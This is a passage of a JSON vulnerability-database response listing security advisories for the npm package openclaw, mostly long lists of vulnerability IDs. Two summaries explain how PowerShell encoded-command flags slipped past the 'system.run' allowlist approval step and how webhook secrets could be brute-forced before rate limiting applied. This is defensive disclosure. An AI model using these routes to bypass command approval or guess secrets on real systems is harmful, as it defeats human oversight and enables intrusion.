the-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-mj4p-rc52-m843"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kh5u-hg46-3qha"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50763?format=json","vulnerability_id":"VCID-kp3a-gr66-zkam","summary":"OpenClaw's system.run allowlist approval parsing missed PowerShell encoded-command wrappers\nOpenClaw's `system.run` shell-wrapper detection did not recognize PowerShell `-EncodedCommand` forms as inline-command wrappers.\n\nIn `allowlist` mode, a caller with access to `system.run` could invoke `pwsh` or `powershell` using `-EncodedCommand`, `-enc`, or `-e`, and the request would fall back to plain argv analysis instead of the normal shell-wrapper approval path. This could allow a PowerShell inline payload to execute without the approval step that equivalent `-Command` invocations would require.\n\nLatest published npm version: `2026.3.2`\n\nFixed on `main` on March 7, 2026 in `1d1757b16f48f1a93cd16ab0ad7e2c3c63ce727d` by recognizing PowerShell encoded-command aliases during shell-wrapper parsing, so allowlist mode continues to require approval for those payloads. Normal approved PowerShell wrapper flows continue to work.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1d1757b16f48f1a93cd16ab0ad7e2c3c63ce727d","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1d1757b16f48f1a93cd16ab0ad7e2c3c63ce727d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-3h2q-j2v4-6w5r","reference_id":"GHSA-3h2q-j2v4-6w5r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3h2q-j2v4-6w5r"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h2q-j2v4-6w5r","reference_id":"GHSA-3h2q-j2v4-6w5r","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3h2q-j2v4-6w5r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-3h2q-j2v4-6w5r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kp3a-gr66-zkam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91547?format=json","vulnerability_id":"VCID-kthe-sgfb-kkb2","summary":"OpenClaw: Zalo webhook rate limiting could be bypassed before secret validation\n### Summary\n\nThe Zalo webhook handler applied request rate limiting only after webhook authentication succeeded. Requests with an invalid secret returned `401` but did not count against the rate limiter, allowing repeated secret guesses without triggering `429`.\n\n### Impact\n\nThis made brute-force guessing materially easier for weak but policy-compliant webhook secrets. Once the secret was guessed, an attacker could submit forged Zalo webhook traffic.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Rate limiting now applies before successful authentication is required, closing the pre-auth brute-force gap. Users should update to `2026.3.12` or later and prefer strong webhook 